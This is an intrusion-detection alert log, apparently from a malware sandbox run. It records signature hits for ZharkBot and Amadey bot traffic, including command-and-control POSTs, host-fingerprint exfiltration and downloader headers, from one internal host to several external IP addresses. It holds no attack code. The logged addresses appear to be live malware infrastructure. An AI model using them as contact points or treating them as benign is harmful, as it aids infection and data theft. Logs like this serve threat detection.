ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:12.004227+0200
SID:	2054413
Severity:	1
Source Port:	49877
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:46.402378+0200
SID:	2054413
Severity:	1
Source Port:	50060
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:08.508635+0200
SID:	2054413
Severity:	1
Source Port:	50098
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:09.238612+0200
SID:	2054413
Severity:	1
Source Port:	49992
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:36.657878+0200
SID:	2054413
Severity:	1
Source Port:	50043
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:58.667726+0200
SID:	2054413
Severity:	1
Source Port:	49852
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:27.918729+0200
SID:	2054413
Severity:	1
Source Port:	49908
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T22:42:12.315719+0200
SID:	2803305
Severity:	3
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:59.700684+0200
SID:	2054413
Severity:	1
Source Port:	50193
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:41.444624+0200
SID:	2054413
Severity:	1
Source Port:	50157
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:48.853240+0200
SID:	2054413
Severity:	1
Source Port:	50064
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:31.611015+0200
SID:	2803270
Severity:	2
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:31.611015+0200
SID:	2054413
Severity:	1
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:37.981377+0200
SID:	2054413
Severity:	1
Source Port:	49818
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:19.695018+0200
SID:	2054413
Severity:	1
Source Port:	50116
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:06.540963+0200
SID:	2054413
Severity:	1
Source Port:	49986
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:27.609753+0200
SID:	2054413
Severity:	1
Source Port:	49785
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:34.430663+0200
SID:	2803270
Severity:	2
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:34.430663+0200
SID:	2054413
Severity:	1
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:26.557627+0200
SID:	2054413
Severity:	1
Source Port:	49905
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:50.018008+0200
SID:	2054413
Severity:	1
Source Port:	50067
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:04.005225+0200
SID:	2054413
Severity:	1
Source Port:	49862
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:23.917613+0200
SID:	2054413
Severity:	1
Source Port:	49900
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:21.391402+0200
SID:	2044597
Severity:	1
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:07.309285+0200
SID:	2054413
Severity:	1
Source Port:	50096
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:40.203684+0200
SID:	2054413
Severity:	1
Source Port:	49931
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:36.329469+0200
SID:	2054413
Severity:	1
Source Port:	49813
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:32.163025+0200
SID:	2054413
Severity:	1
Source Port:	49916
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:09.307105+0200
SID:	2044597
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:24.728186+0200
SID:	2054413
Severity:	1
Source Port:	50021
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:33.278473+0200
SID:	2054413
Severity:	1
Source Port:	50037
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:13.173250+0200
SID:	2054413
Severity:	1
Source Port:	49999
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:36.442959+0200
SID:	2054413
Severity:	1
Source Port:	49923
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:30.995956+0200
SID:	2054413
Severity:	1
Source Port:	50031
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:20.881414+0200
SID:	2054413
Severity:	1
Source Port:	50118
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:19.639376+0200
SID:	2044597
Severity:	1
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:25.940791+0200
SID:	2054413
Severity:	1
Source Port:	50023
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:04.854755+0200
SID:	2054413
Severity:	1
Source Port:	50091
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:13.367531+0200
SID:	2054413
Severity:	1
Source Port:	49879
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:35.864938+0200
SID:	2054413
Severity:	1
Source Port:	49810
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:01.355179+0200
SID:	2054413
Severity:	1
Source Port:	49857
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:54.733127+0200
SID:	2054413
Severity:	1
Source Port:	49961
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:20.760459+0200
SID:	2054413
Severity:	1
Source Port:	50014
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:54.613418+0200
SID:	2054413
Severity:	1
Source Port:	50184
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:11.098365+0200
SID:	2803270
Severity:	2
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:11.098365+0200
SID:	2054413
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:39.134346+0200
SID:	2054413
Severity:	1
Source Port:	49928
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:02.414836+0200
SID:	2054413
Severity:	1
Source Port:	50085
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:06.578639+0200
SID:	2054413
Severity:	1
Source Port:	49867
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:37.855787+0200
SID:	2054413
Severity:	1
Source Port:	50044
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:58.478523+0200
SID:	2054413
Severity:	1
Source Port:	50191
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:51.236828+0200
SID:	2054413
Severity:	1
Source Port:	50068
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:41:58.177817+0200
SID:	2856147
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:46.940077+0200
SID:	2054413
Severity:	1
Source Port:	50166
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:40.282828+0200
SID:	2054413
Severity:	1
Source Port:	50155
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:52.260534+0200
SID:	2054413
Severity:	1
Source Port:	50178
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:33.466766+0200
SID:	2054413
Severity:	1
Source Port:	50141
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:22.484123+0200
SID:	2054413
Severity:	1
Source Port:	49897
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:46:02.548766+0200
SID:	2054413
Severity:	1
Source Port:	50196
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:04.843229+0200
SID:	2044597
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:14.077972+0200
SID:	2054413
Severity:	1
Source Port:	50106
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:31.483655+0200
SID:	2044597
Severity:	1
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T22:42:02.960155+0200
SID:	2803305
Severity:	3
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:10.662884+0200
SID:	2054413
Severity:	1
Source Port:	50100
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:27.140709+0200
SID:	2054413
Severity:	1
Source Port:	50025
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:48.111939+0200
SID:	2054413
Severity:	1
Source Port:	50169
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:41:59.590183+0200
SID:	2044597
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:44.228573+0200
SID:	2054413
Severity:	1
Source Port:	49940
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:18.483994+0200
SID:	2054413
Severity:	1
Source Port:	50113
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:02.804905+0200
SID:	2054413
Severity:	1
Source Port:	49859
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:01.133264+0200
SID:	2054413
Severity:	1
Source Port:	49976
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:23.227594+0200
SID:	2803270
Severity:	2
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:23.227594+0200
SID:	2054413
Severity:	1
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:45.779554+0200
SID:	2054413
Severity:	1
Source Port:	50164
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:47.746291+0200
SID:	2054413
Severity:	1
Source Port:	50062
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:05.320279+0200
SID:	2054413
Severity:	1
Source Port:	49864
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:05.452186+0200
SID:	2044696
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:11.800167+0200
SID:	2054413
Severity:	1
Source Port:	49997
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:32.090475+0200
SID:	2054413
Severity:	1
Source Port:	50035
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:19.448571+0200
SID:	2054413
Severity:	1
Source Port:	50011
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:23.335067+0200
SID:	2044597
Severity:	1
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:37.923231+0200
SID:	2054413
Severity:	1
Source Port:	50149
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:59.938568+0200
SID:	2054413
Severity:	1
Source Port:	49973
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:56.067835+0200
SID:	2054413
Severity:	1
Source Port:	49847
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:50.933605+0200
SID:	2054413
Severity:	1
Source Port:	49953
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:56.211779+0200
SID:	2054413
Severity:	1
Source Port:	50075
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:11.978440+0200
SID:	2054413
Severity:	1
Source Port:	50103
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 104.21.21.16

Timestamp:	2024-08-31T22:42:07.104723+0200
SID:	2803305
Severity:	3
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:14.345876+0200
SID:	2054413
Severity:	1
Source Port:	50003
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:05.326288+0200
SID:	2054413
Severity:	1
Source Port:	49983
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 172.67.143.156

Timestamp:	2024-08-31T22:41:59.601142+0200
SID:	2803305
Severity:	3
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:34.691159+0200
SID:	2054413
Severity:	1
Source Port:	50144
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:08.174165+0200
SID:	2054413
Severity:	1
Source Port:	49869
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:15.706986+0200
SID:	2044597
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:16.679258+0200
SID:	2054413
Severity:	1
Source Port:	50111
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:31.630686+0200
SID:	2803270
Severity:	2
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:31.630686+0200
SID:	2054413
Severity:	1
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:07.887534+0200
SID:	2054413
Severity:	1
Source Port:	49989
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:35.799944+0200
SID:	2054413
Severity:	1
Source Port:	50147
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:25.777964+0200
SID:	2054413
Severity:	1
Source Port:	50126
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:39.089458+0200
SID:	2054413
Severity:	1
Source Port:	50151
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:13.219623+0200
SID:	2044597
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:57.426415+0200
SID:	2054413
Severity:	1
Source Port:	49850
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:30.692084+0200
SID:	2054413
Severity:	1
Source Port:	49792
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:30.761931+0200
SID:	2054413
Severity:	1
Source Port:	50136
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:17.691010+0200
SID:	2803270
Severity:	2
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:17.691010+0200
SID:	2054413
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:23.307513+0200
SID:	2054413
Severity:	1
Source Port:	50122
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

